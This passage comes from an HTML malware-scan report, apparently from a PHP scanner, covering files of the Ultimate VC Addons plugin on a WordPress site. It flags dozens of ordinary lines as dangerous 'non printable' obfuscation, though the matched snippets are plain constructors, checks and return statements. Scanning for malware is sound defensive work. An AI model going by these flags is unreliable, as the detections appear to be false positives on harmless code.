</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_328").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_video_banner.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 13.98 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_329" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } </span><span style="color: #0000BB">$Ultimate_Video_Banner </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Video_Banner</span><span style="color: #007700">; if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_video_banner' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_video_banner </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_video_banner_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 228</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_video_banner_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_video_banner_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 357</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_329").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_swatch_book.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 29.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 16</span><br><table id="file_330" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$Ultimate_Swatch_Book</span><span style="color: #007700">-></span><span style="color: #0000BB">swatch_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">); } } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">", "</span><span style="color: #0000BB">ultimate_vc</span><span style="color: #DD0000">"),</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_is_inline'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_swatch_assets</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">swatch_book_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 547</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">swatch_container</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content</span><span style="color: #007700">=</span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 629</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 686</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 688</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">index</span><span style="color: #007700">, </span><span style="color: #0000BB">element</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 698</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">swatch_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content</span><span style="color: #007700">=</span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 758</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">content</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 760</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$Ultimate_Swatch_Book</span><span style="color: #007700">-></span><span style="color: #0000BB">swatch_container</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 769</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$Ultimate_Swatch_Book</span><span style="color: #007700">-></span><span style="color: #0000BB">swatch_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_330").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_flip_box.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 44.37 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_331" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } function </span><span style="color: #0000BB">flip_box_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'flip_box_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'flip-box'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, array( </span><span style="color: #DD0000">'jquery' </span><span style="color: #007700">), </span><span style="color: #0000BB">ULTIMATE_VERSION</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">); </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult-flip-style'</span><span style="color: #007700">, </span><span style="color: #DD0000">'flip-box' </span><span style="color: #007700">); } } new </span><span style="color: #0000BB">AIO_Fli</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1050</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1052</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">flip_box_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">block_init</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">icon block</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 764</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">block_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_331").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_icon_timeline.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 67.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_332" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html </span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCodesContainer'</span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode_icon_timeline'</span><span style="color: #007700">)) { class </span><span style="color: #0000BB">WPBakeryShortCode_icon_timeline </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCodesContainer </span><span style="color: #007700">{ } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCodesContainer'</span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exist</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1142</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_timeline</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output </span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_timeline_sep</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">=</span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1253</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1255</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_timeline_feat</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$feat_spl </span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1422</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_timeline_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1568</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html </span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_timeline_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_icon_timeline</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_332").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_dual_button.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 61.59 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_333" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$subop</span><span style="color: #007700">; } function </span><span style="color: #0000BB">ultimate_dual_button</span><span style="color: #007700">() { if(</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">"name" </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Dual Button"</span><span style="color: #007700">), </span><span style="color: #DD0000">"base" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"ult_dualbutton"</span><span style="color: #007700">, </span><span style="color: #DD0000">"icon"</span><span style="color: #007700">=> </span><span style="color: #DD0000">"uvc_dual_button"</span><span style="color: #007700">, </span><span style="color: #DD0000">"class" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"uvc_dual_button"</span><span style="color: #007700">, </span><span style="color: #DD0000">"category" </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Ultimate VC Addons"</span><span style="color: #007700">,</span><span style="color: #DD0000">"ultimate_vc"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
